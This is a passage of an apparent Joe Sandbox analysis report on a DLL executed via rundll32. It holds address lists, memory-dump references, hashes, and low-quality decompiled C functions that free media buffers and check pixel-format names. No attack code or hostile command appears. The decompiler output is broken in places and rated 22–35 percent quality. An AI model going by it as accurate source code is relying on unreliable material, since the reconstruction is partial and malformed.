                                                                      0x1001bdf2
                                                                      0x1001bdf2
                                                                      0x1001bdf5
                                                                      0x1001bed0
                                                                      0x00000000
                                                                      0x1001bdfb
                                                                      0x1001bdfb
                                                                      0x1001be01
                                                                      0x1001be06
                                                                      0x1001be08
                                                                      0x00000000
                                                                      0x1001be0a
                                                                      0x1001be0a
                                                                      0x1001be0e
                                                                      0x1001be15
                                                                      0x1001be1a
                                                                      0x1001be1d
                                                                      0x1001be1f
                                                                      0x00000000
                                                                      0x1001be21
                                                                      0x1001be21
                                                                      0x1001be28
                                                                      0x1001be2b
                                                                      0x1001be2d
                                                                      0x1001be30
                                                                      0x1001bf96
                                                                      0x1001bf98
                                                                      0x1001c033
                                                                      0x1001c036
                                                                      0x1001c037
                                                                      0x1001c038
                                                                      0x1001c039
                                                                      0x1001c039
                                                                      0x1001bf9e
                                                                      0x1001bfa4
                                                                      0x1001c01e
                                                                      0x1001c021
                                                                      0x1001c024
                                                                      0x1001c027
                                                                      0x1001c02a
                                                                      0x1001c02a
                                                                      0x1001bfa6
                                                                      0x1001bfac
                                                                      0x00000000
                                                                      0x1001bfb2
                                                                      0x1001bfb4
                                                                      0x1001bfbd
                                                                      0x1001bfc0
                                                                      0x1001bfc0
                                                                      0x00000000
                                                                      0x1001bfc0
                                                                      0x1001bf66
                                                                      0x1001bf66
                                                                      0x1001bf68
                                                                      0x1001bf6a
                                                                      0x1001bf6c
                                                                      0x1001bf72
                                                                      0x1001bf77
                                                                      0x1001bf7a
                                                                      0x1001bf7a
                                                                      0x1001bf7f
                                                                      0x1001bf82
                                                                      0x1001bebe
                                                                      0x1001bebe
                                                                      0x1001bebe
                                                                      0x1001bf88
                                                                      0x1001bf8c
                                                                      0x1001bf8e
                                                                      0x1001bf8e
                                                                      0x1001bec9
                                                                      0x00000000
                                                                      0x1001be36
                                                                      0x1001be36
                                                                      0x1001be36
                                                                      0x1001be36
                                                                      0x1001be36
                                                                      0x1001bed3
                                                                      0x1001bed3
                                                                      0x1001bed9
                                                                      0x1001bedb
                                                                      0x1001bedd
                                                                      0x1001bee2
                                                                      0x1001bfdf
                                                                      0x1001bfe2
                                                                      0x1001bfe7
                                                                      0x1001bfea
                                                                      0x1001bfea
                                                                      0x1001bee8
                                                                      0x1001beeb
                                                                      0x1001bfc7
                                                                      0x1001bfca
                                                                      0x1001bfcd
                                                                      0x1001bfd0
                                                                      0x1001bfd3
                                                                      0x1001bfd3
                                                                      0x1001bef1
                                                                      0x1001bef7
                                                                      0x1001bef9
                                                                      0x1001bef9
                                                                      0x1001befc
                                                                      0x1001beff
                                                                      0x1001bf02
                                                                      0x1001bf05
                                                                      0x1001bf05
                                                                      0x1001bf09
                                                                      0x1001bf0b
                                                                      0x1001bf0d
                                                                      0x1001bf11
                                                                      0x1001bf13
                                                                      0x1001bf19
                                                                      0x1001bf1e
                                                                      0x1001bf21
                                                                      0x1001bf21
                                                                      0x1001bf26
                                                                      0x1001bf29
                                                                      0x1001bf2f
                                                                      0x1001bf2f
                                                                      0x1001bf32
                                                                      0x1001bf38
                                                                      0x1001bf3d
                                                                      0x1001bf40
                                                                      0x1001bf43
                                                                      0x1001c00b
                                                                      0x1001c00e
                                                                      0x1001c013
                                                                      0x1001c016

                                                                      APIs
                                                                      Strings
                                                                      • Invalid mapping found when attempting unmap., xrefs: 1001E635
                                                                      • Failed to map frame into derived frame context: %d., xrefs: 1001E71D
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_frame_unref
                                                                      • String ID: Failed to map frame into derived frame context: %d.$Invalid mapping found when attempting unmap.
                                                                      • API String ID: 3522828444-968520014
                                                                      • Opcode ID: a8cee79f1116f489e9366e10ea9b5597fa9099dcfd39c1eecab353edc7ebc651
                                                                      • Instruction ID: 1d7c3b7aca9d3417cd3ea7e1bcd086570995cae0267e84f3f0b04429ecccd582
                                                                      • Opcode Fuzzy Hash: a8cee79f1116f489e9366e10ea9b5597fa9099dcfd39c1eecab353edc7ebc651
                                                                      • Instruction Fuzzy Hash: F991A0B4A09B418FC744DF29C58051EBBE1FF88794F55896DE8998B351E730ED81CB82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 22%
                                                                      			E10010320(intOrPtr* _a4) {
                                                                      				signed int _v32;
                                                                      				signed int _v36;
                                                                      				intOrPtr _v40;
                                                                      				signed int _v48;
                                                                      				intOrPtr _v52;
                                                                      				signed int _v56;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t97;
                                                                      				signed int _t100;
                                                                      				signed int _t106;
                                                                      				signed int _t112;
                                                                      				signed int _t118;
                                                                      				signed int _t124;
                                                                      				signed int _t130;
                                                                      				signed int _t136;
                                                                      				signed int _t139;
                                                                      				signed int _t147;
                                                                      				intOrPtr _t148;
                                                                      				intOrPtr _t149;
                                                                      				intOrPtr _t150;
                                                                      				intOrPtr _t151;
                                                                      				intOrPtr _t152;
                                                                      				intOrPtr _t153;
                                                                      				signed int _t154;
                                                                      				signed int _t158;
                                                                      				signed int _t172;
                                                                      				signed int _t174;
                                                                      				signed int _t176;
                                                                      				signed int _t178;
                                                                      				signed int _t180;
                                                                      				signed int _t182;
                                                                      				signed int _t184;
                                                                      				signed int _t186;
                                                                      				signed int _t187;
                                                                      				intOrPtr* _t188;
                                                                      				intOrPtr* _t189;
                                                                      				signed int _t199;
                                                                      				void* _t200;
                                                                      				intOrPtr* _t201;
                                                                      
                                                                      				_t188 = 0x100b3200;
                                                                      				_t201 = _t200 - 0x2c;
                                                                      				_v40 = 0;
                                                                      				_t189 = _a4;
                                                                      				while(1) {
                                                                      					_v40 = _v40 + 1;
                                                                      					_t188 = _t188 + 0x40;
                                                                      					if(_v40 == 0x17) {
                                                                      						break;
                                                                      					}
                                                                      					_t6 = _t188 + 0x10; // 0x1000ffb0
                                                                      					if( *_t6 == 0) {
                                                                      						continue;
                                                                      					} else {
                                                                      						_t9 = _t188 + 0x10; // 0x1000ffb0
                                                                      						_t10 = _t188 + 0x14; // 0x10010008
                                                                      						_t172 =  *_t10;
                                                                      						 *_t201 =  *((intOrPtr*)(_t189 + 0x10));
                                                                      						_v56 =  *((intOrPtr*)(_t189 + 0x14));
                                                                      						_v52 =  *_t9;
                                                                      						_v48 = _t172;
                                                                      						_t97 = L10035A10( *((intOrPtr*)(_t189 + 0x14)), _t188, _t189);
                                                                      						_t147 = _t172;
                                                                      						_t14 = _t188 + 0x1c; // 0x1000fde8
                                                                      						_t192 =  <  ? _t97 :  ~_t97;
                                                                      						_t15 = _t188 + 0x18; // 0x10010060
                                                                      						_v48 =  *_t14;
                                                                      						_v52 =  *_t15;
                                                                      						_t174 =  *((intOrPtr*)(_t189 + 0x1c));
                                                                      						 *_t201 =  *((intOrPtr*)(_t189 + 0x18));
                                                                      						_v56 = _t174;
                                                                      						_t100 = L10035A10(_t147, _t188, _t189);
                                                                      						 *_t201 =  <  ? _t97 :  ~_t97;
                                                                      						_v56 = _t147;
                                                                      						_v48 = _t174;
                                                                      						_t102 =  <  ? _t100 :  ~_t100;
                                                                      						_v52 =  <  ? _t100 :  ~_t100;
                                                                      						_t148 = L10035990(_t147, _t189);
                                                                      						_t24 = _t188 + 0x20; // 0x1000fe50
                                                                      						_t25 = _t188 + 0x24; // 0x0
                                                                      						_v52 =  *_t24;
                                                                      						_v48 =  *_t25;
                                                                      						_t176 =  *((intOrPtr*)(_t189 + 0x24));
                                                                      						 *_t201 =  *((intOrPtr*)(_t189 + 0x20));
                                                                      						_v56 = _t176;
                                                                      						_t106 = L10035A10(_t148, _t188, _t189);
                                                                      						 *_t201 = _t148;
                                                                      						_v56 = _t174;
                                                                      						_v48 = _t176;
                                                                      						_t108 =  <  ? _t106 :  ~_t106;
                                                                      						_v52 =  <  ? _t106 :  ~_t106;
                                                                      						_t149 = L10035990(_t148, _t189);
                                                                      						_t34 = _t188 + 0x28; // 0x0
                                                                      						_t35 = _t188 + 0x2c; // 0x0
                                                                      						_v52 =  *_t34;
                                                                      						_v48 =  *_t35;
                                                                      						_t178 =  *((intOrPtr*)(_t189 + 0x2c));
                                                                      						 *_t201 =  *((intOrPtr*)(_t189 + 0x28));
                                                                      						_v56 = _t178;
                                                                      						_t112 = L10035A10(_t149, _t188, _t189);
                                                                      						 *_t201 = _t149;
                                                                      						_v56 = _t176;
                                                                      						_v48 = _t178;
                                                                      						_t114 =  <  ? _t112 :  ~_t112;
                                                                      						_v52 =  <  ? _t112 :  ~_t112;
                                                                      						_t150 = L10035990(_t149, _t189);
                                                                      						_t44 = _t188 + 0x30; // 0x0
                                                                      						_t45 = _t188 + 0x34; // 0x0
                                                                      						_v52 =  *_t44;
                                                                      						_v48 =  *_t45;
                                                                      						_t180 =  *((intOrPtr*)(_t189 + 0x34));
                                                                      						 *_t201 =  *((intOrPtr*)(_t189 + 0x30));
                                                                      						_v56 = _t180;
                                                                      						_t118 = L10035A10(_t150, _t188, _t189);
                                                                      						 *_t201 = _t150;
                                                                      						_v56 = _t178;
                                                                      						_v48 = _t180;
                                                                      						_t120 =  <  ? _t118 :  ~_t118;
                                                                      						_v52 =  <  ? _t118 :  ~_t118;
                                                                      						_t151 = L10035990(_t150, _t189);
                                                                      						_t54 = _t188 + 0x38; // 0x0
                                                                      						_t55 = _t188 + 0x3c; // 0x0
                                                                      						_v52 =  *_t54;
                                                                      						_v48 =  *_t55;
                                                                      						_t182 =  *((intOrPtr*)(_t189 + 0x3c));
                                                                      						 *_t201 =  *((intOrPtr*)(_t189 + 0x38));
                                                                      						_v56 = _t182;
                                                                      						_t124 = L10035A10(_t151, _t188, _t189);
                                                                      						 *_t201 = _t151;
                                                                      						_v56 = _t180;
                                                                      						_v48 = _t182;
                                                                      						_t126 =  <  ? _t124 :  ~_t124;
                                                                      						_v52 =  <  ? _t124 :  ~_t124;
                                                                      						_t152 = L10035990(_t151, _t189);
                                                                      						_t64 = _t188 + 4; // 0x1000fea8
                                                                      						_v52 =  *_t188;
                                                                      						_v48 =  *_t64;
                                                                      						_t184 =  *(_t189 + 4);
                                                                      						 *_t201 =  *_t189;
                                                                      						_v56 = _t184;
                                                                      						_t130 = L10035A10(_t152, _t188, _t189);
                                                                      						 *_t201 = _t152;
                                                                      						_v56 = _t182;
                                                                      						_v48 = _t184;
                                                                      						_t132 =  <  ? _t130 :  ~_t130;
                                                                      						_v52 =  <  ? _t130 :  ~_t130;
                                                                      						_t153 = L10035990(_t152, _t189);
                                                                      						_t72 = _t188 + 8; // 0x1000ff00
                                                                      						_t73 = _t188 + 0xc; // 0x1000ff58
                                                                      						_v52 =  *_t72;
                                                                      						_v48 =  *_t73;
                                                                      						_t186 =  *(_t189 + 0xc);
                                                                      						 *_t201 =  *((intOrPtr*)(_t189 + 8));
                                                                      						_v56 = _t186;
                                                                      						_t136 = L10035A10(_t153, _t188, _t189);
                                                                      						 *_t201 = _t153;
                                                                      						_v56 = _t184;
                                                                      						_v48 = _t186;
                                                                      						_t138 =  <  ? _t136 :  ~_t136;
                                                                      						_v52 =  <  ? _t136 :  ~_t136;
                                                                      						_t139 = L10035990(_t153, _t189);
                                                                      						_v36 = _t186;
                                                                      						_t154 = _t139;
                                                                      						_t199 = _t186;
                                                                      						_v32 = _t186 >> 0x1f;
                                                                      						_t187 = 0x3e8 * _t154 >> 0x20;
                                                                      						asm("sbb edx, [esp+0x1c]");
                                                                      						if((_t187 | 0x000003e8 * _t154 - _v36) != 0) {
                                                                      							_t158 = (_v32 ^ _t187) >> 0x0000001f | 0x00000001;
                                                                      							goto L7;
                                                                      						} else {
                                                                      							if(_t199 != 0) {
                                                                      								continue;
                                                                      							} else {
                                                                      								if(_t154 == 0) {
                                                                      									L8:
                                                                      									return _v40;
                                                                      								} else {
                                                                      									_t158 = _t154 >> 0x1f;
                                                                      									L7:
                                                                      									if(_t158 + 1 != 0) {
                                                                      										continue;
                                                                      									} else {
                                                                      										goto L8;
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					L11:
                                                                      				}
                                                                      				_v40 = 2;
                                                                      				return _v40;
                                                                      				goto L11;
                                                                      			}












































                                                                      0x10010429
                                                                      0x10010431
                                                                      0x10010434
                                                                      0x1001043d
                                                                      0x10010441
                                                                      0x10010444
                                                                      0x10010447
                                                                      0x1001044b
                                                                      0x10010452
                                                                      0x10010455
                                                                      0x10010458
                                                                      0x1001045c
                                                                      0x10010461
                                                                      0x10010464
                                                                      0x10010468
                                                                      0x10010470
                                                                      0x10010473
                                                                      0x1001047c
                                                                      0x10010480
                                                                      0x10010483
                                                                      0x10010486
                                                                      0x1001048a
                                                                      0x10010491
                                                                      0x10010494
                                                                      0x10010497
                                                                      0x1001049b
                                                                      0x100104a0
                                                                      0x100104a3
                                                                      0x100104a7
                                                                      0x100104af
                                                                      0x100104b2
                                                                      0x100104bb
                                                                      0x100104c1
                                                                      0x100104c4
                                                                      0x100104c8
                                                                      0x100104ce
                                                                      0x100104d1
                                                                      0x100104d4
                                                                      0x100104d8
                                                                      0x100104dd
                                                                      0x100104e0
                                                                      0x100104e4
                                                                      0x100104ec
                                                                      0x100104ef
                                                                      0x100104f8
                                                                      0x100104fc
                                                                      0x100104ff
                                                                      0x10010502
                                                                      0x10010506
                                                                      0x1001050d
                                                                      0x10010510
                                                                      0x10010513
                                                                      0x10010517
                                                                      0x1001051c
                                                                      0x1001051f
                                                                      0x10010523
                                                                      0x1001052b
                                                                      0x1001052e
                                                                      0x10010532
                                                                      0x10010537
                                                                      0x1001053b
                                                                      0x10010542
                                                                      0x10010544
                                                                      0x1001054d
                                                                      0x10010553
                                                                      0x1001055b
                                                                      0x10010591
                                                                      0x00000000
                                                                      0x1001055d
                                                                      0x1001055f
                                                                      0x00000000
                                                                      0x10010565
                                                                      0x10010567
                                                                      0x10010576
                                                                      0x10010581
                                                                      0x10010569
                                                                      0x10010569
                                                                      0x1001056c
                                                                      0x10010570
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10010570
                                                                      0x10010567
                                                                      0x1001055f
                                                                      0x1001055b
                                                                      0x00000000
                                                                      0x10010359
                                                                      0x100105a5
                                                                      0x100105b4
                                                                      0x00000000

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_sub_q$mv_add_q$mv_reduce
                                                                      • String ID:
                                                                      • API String ID: 416313997-0
                                                                      • Opcode ID: fd26de4a70a645a75b6084fdddd25abeecc13d0e1f18b84e77e2c88ea45aa38b
                                                                      • Instruction ID: 2bd5eacdd0496173cebd80a3581587597599a29e230854eb82bb207fe0e5f862
                                                                      • Opcode Fuzzy Hash: fd26de4a70a645a75b6084fdddd25abeecc13d0e1f18b84e77e2c88ea45aa38b
                                                                      • Instruction Fuzzy Hash: 0281A1B4A08B069FC748DF6AD18051AFBE1FF88211F50C92EE59DC7721E670E8519F82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: strcmp
                                                                      • String ID: %s%s$bgr32$bgra$rgb32$rgba$yuv420p
                                                                      • API String ID: 1004003707-3566121812
                                                                      • Opcode ID: 9550c25b13b3c51ea765e66f3a5b83d88c901e3b85b8e96a12ffededae0969d6
                                                                      • Instruction ID: 807c7c8d8e474d4a4436a7f9c776c039c9797f57d3ea9103522d9848d4e2685b
                                                                      • Opcode Fuzzy Hash: 9550c25b13b3c51ea765e66f3a5b83d88c901e3b85b8e96a12ffededae0969d6
                                                                      • Instruction Fuzzy Hash: EA314179E087559BC701DF69848435EB6D4FF84785F43882EE989DF301EA78EC009B81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 35%
                                                                      			E1001A460(signed char __eax) {
                                                                      				void* __ebx;
                                                                      				void* __esi;
                                                                      				void* _t68;
                                                                      				intOrPtr _t74;
                                                                      				signed char _t79;
                                                                      				signed char _t82;
                                                                      				char* _t83;
                                                                      				intOrPtr _t85;
                                                                      				signed int _t86;
                                                                      				signed int _t89;
                                                                      				intOrPtr _t90;
                                                                      				signed int _t92;
                                                                      				signed int _t94;
                                                                      				intOrPtr _t95;
                                                                      				intOrPtr _t96;
                                                                      				intOrPtr* _t98;
                                                                      				void* _t99;
                                                                      				intOrPtr* _t100;
                                                                      
                                                                      				_t79 = __eax;
                                                                      				_t100 = _t99 - 0x1c;
                                                                      				if( *((intOrPtr*)(__eax + 0xe4)) > 0) {
                                                                      					_t89 = 0;
                                                                      					do {
                                                                      						_t98 =  *((intOrPtr*)(__eax + 0xe0)) + _t89 * 4;
                                                                      						_t89 = _t89 + 1;
                                                                      						_t95 =  *_t98;
                                                                      						_t96 = _t95 + 0xc;
                                                                      						 *_t100 = _t95 + 0x10;
                                                                      						E1000A000(__eax, _t96);
                                                                      						 *_t100 = _t96;
                                                                      						L10011CC0();
                                                                      						 *_t100 = _t98;
                                                                      						E100290E0();
                                                                      					} while (_t89 <  *((intOrPtr*)(_t79 + 0xe4)));
                                                                      				}
                                                                      				_t90 = _t79 + 0xb8;
                                                                      				 *((intOrPtr*)(_t79 + 0xe4)) = 0;
                                                                      				 *_t100 = _t79 + 0xe0;
                                                                      				_t85 = _t79 + 0xd8;
                                                                      				E100290E0();
                                                                      				do {
                                                                      					 *_t100 = _t90;
                                                                      					_t90 = _t90 + 4;
                                                                      					E1000A000(_t79, _t90);
                                                                      				} while (_t85 != _t90);
                                                                      				if( *((intOrPtr*)(_t79 + 0xdc)) > 0) {
                                                                      					_t94 = 0;
                                                                      					do {
                                                                      						_t74 =  *((intOrPtr*)(_t79 + 0xd8)) + _t94 * 4;
                                                                      						_t94 = _t94 + 1;
                                                                      						 *_t100 = _t74;
                                                                      						E1000A000(_t79, _t94);
                                                                      					} while (_t94 <  *((intOrPtr*)(_t79 + 0xdc)));
                                                                      				}
                                                                      				 *_t100 = _t85;
                                                                      				E100290E0();
                                                                      				 *_t100 = _t79 + 0x118;
                                                                      				L10011CC0();
                                                                      				 *_t100 = _t79 + 0x128;
                                                                      				E1000A000(_t79, _t90);
                                                                      				 *_t100 = _t79 + 0x12c;
                                                                      				E1000A000(_t79, _t90);
                                                                      				 *_t100 = _t79 + 0x140;
                                                                      				E1000A000(_t79, _t90);
                                                                      				if( *(_t79 + 0x40) != _t79) {
                                                                      					 *_t100 = _t79 + 0x40;
                                                                      					E100290E0();
                                                                      				}
                                                                      				_t86 = 0x168;
                                                                      				 *_t100 = _t79 + 0x148;
                                                                      				E1000D270();
                                                                      				_t82 = _t79;
                                                                      				if((_t79 & 0x00000001) != 0) {
                                                                      					 *_t79 = 0;
                                                                      					_t82 = _t79 + 1;
                                                                      					_t86 = 0x167;
                                                                      					if((_t82 & 0x00000002) == 0) {
                                                                      						goto L12;
                                                                      					} else {
                                                                      						goto L20;
                                                                      					}
                                                                      					L14:
                                                                      					_t83 = _t82 + _t68;
                                                                      					if((_t86 & 0x00000004) != 0) {
                                                                      						 *_t83 = 0;
                                                                      						_t83 = _t83 + 4;
                                                                      					}
                                                                      					if((_t86 & 0x00000002) != 0) {
                                                                      						 *_t83 = 0;
                                                                      						_t83 = _t83 + 2;
                                                                      					}
                                                                      					if((_t86 & 0x00000001) != 0) {
                                                                      						 *_t83 = 0;
                                                                      					}
                                                                      					 *((intOrPtr*)(_t79 + 0x100)) = 0;
                                                                      					 *((intOrPtr*)(_t79 + 0xf4)) = 2;
                                                                      					 *((intOrPtr*)(_t79 + 0x70)) = 0;
                                                                      					 *((intOrPtr*)(_t79 + 0x74)) = 0x80000000;
                                                                      					 *((intOrPtr*)(_t79 + 0x68)) = 0;
                                                                      					 *((intOrPtr*)(_t79 + 0x6c)) = 0x80000000;
                                                                      					 *((intOrPtr*)(_t79 + 0x104)) = 0x80000000;
                                                                      					 *((intOrPtr*)(_t79 + 0x108)) = 0xffffffff;
                                                                      					 *((intOrPtr*)(_t79 + 0x10c)) = 0xffffffff;
                                                                      					 *((intOrPtr*)(_t79 + 0x124)) = 0xffffffff;
                                                                      					 *((intOrPtr*)(_t79 + 0x7c)) = 1;
                                                                      					 *((intOrPtr*)(_t79 + 0x54)) = 1;
                                                                      					 *((intOrPtr*)(_t79 + 0x60)) = 1;
                                                                      					 *((intOrPtr*)(_t79 + 0x50)) = 0xffffffff;
                                                                      					 *(_t79 + 0x40) = _t79;
                                                                      					 *((intOrPtr*)(_t79 + 0xf0)) = 2;
                                                                      					 *((intOrPtr*)(_t79 + 0xf8)) = 2;
                                                                      					return 2;
                                                                      				} else {
                                                                      					if((_t82 & 0x00000002) != 0) {
                                                                      						L20:
                                                                      						 *_t82 = 0;
                                                                      						_t86 = _t86 - 2;
                                                                      						_t82 = _t82 + 2;
                                                                      					}
                                                                      				}
                                                                      				L12:
                                                                      				_t68 = 0;
                                                                      				_t92 = _t86 & 0xfffffff8;
                                                                      				do {
                                                                      					 *((intOrPtr*)(_t82 + _t68)) = 0;
                                                                      					 *((intOrPtr*)(_t82 + _t68 + 4)) = 0;
                                                                      					_t68 = _t68 + 8;
                                                                      				} while (_t68 < _t92);
                                                                      				goto L14;
                                                                      			}





















                                                                      0x1001a6ab
                                                                      0x1001a6ab
                                                                      0x1001a5bc
                                                                      0x1001a698
                                                                      0x1001a69d
                                                                      0x1001a69d
                                                                      0x1001a5c5
                                                                      0x1001a690
                                                                      0x1001a690
                                                                      0x1001a5d2
                                                                      0x1001a5e2
                                                                      0x1001a5f2
                                                                      0x1001a603
                                                                      0x1001a60a
                                                                      0x1001a611
                                                                      0x1001a618
                                                                      0x1001a61e
                                                                      0x1001a624
                                                                      0x1001a62a
                                                                      0x1001a630
                                                                      0x1001a637
                                                                      0x1001a63e
                                                                      0x1001a645
                                                                      0x1001a64c
                                                                      0x1001a64f
                                                                      0x1001a655
                                                                      0x1001a662
                                                                      0x1001a58a
                                                                      0x1001a58d
                                                                      0x1001a680
                                                                      0x1001a680
                                                                      0x1001a685
                                                                      0x1001a688
                                                                      0x1001a688
                                                                      0x1001a58d
                                                                      0x1001a593
                                                                      0x1001a595
                                                                      0x1001a597
                                                                      0x1001a59a
                                                                      0x1001a59a
                                                                      0x1001a59d
                                                                      0x1001a5a1
                                                                      0x1001a5a4
                                                                      0x00000000

                                                                      APIs
                                                                      • mv_dict_free.F086(?,?,?,?,?,?,1001ADCA), ref: 1001A49E
                                                                      • mv_freep.F086(?,?,?,?,?,?,1001ADCA), ref: 1001A4A6
                                                                      • mv_buffer_unref.F086(?,?,?,?,?,?,1001ADCA), ref: 1001A496
                                                                        • Part of subcall function 1000A000: mv_freep.F086 ref: 1000A01E
                                                                      • mv_freep.F086(?,?,?,?,?,?,1001ADCA), ref: 1001A4D0
                                                                      • mv_buffer_unref.F086(?,?,?,?,?,?,1001ADCA), ref: 1001A4E6
                                                                      • mv_buffer_unref.F086(?,?,?,?,?,?,1001ADCA), ref: 1001A50D
                                                                      • mv_freep.F086(?,?,?,?,?,?,1001ADCA), ref: 1001A51D
                                                                      • mv_dict_free.F086(?,?,?,?,?,?,1001ADCA), ref: 1001A52B
                                                                      • mv_buffer_unref.F086(?,?,?,?,?,?,1001ADCA), ref: 1001A539
                                                                      • mv_buffer_unref.F086(?,?,?,?,?,?,1001ADCA), ref: 1001A547
                                                                      • mv_buffer_unref.F086(?,?,?,?,?,?,1001ADCA), ref: 1001A555
                                                                      • mv_freep.F086(?,?,?,?,?,?,1001ADCA), ref: 1001A565
                                                                      • mv_channel_layout_uninit.F086(?,?,?,?,?,?,1001ADCA), ref: 1001A578
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_buffer_unref$mv_freep$mv_dict_free$mv_channel_layout_uninit
                                                                      • String ID:
                                                                      • API String ID: 1735483532-0
                                                                      • Opcode ID: b1f051f397a595c89fd00aa7c4bdbf0e8165c123e935fbb0ada5b3fbc138a149
                                                                      • Instruction ID: e5137f4a5bc7018b3bf66a3982d40490682209c4fe07239027ca6129b2817d8d
                                                                      • Opcode Fuzzy Hash: b1f051f397a595c89fd00aa7c4bdbf0e8165c123e935fbb0ada5b3fbc138a149
                                                                      • Instruction Fuzzy Hash: 66516BB19046068BDB10DF28C48178A77E5FF45364F0A46BADC989F38AD774E8C5CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
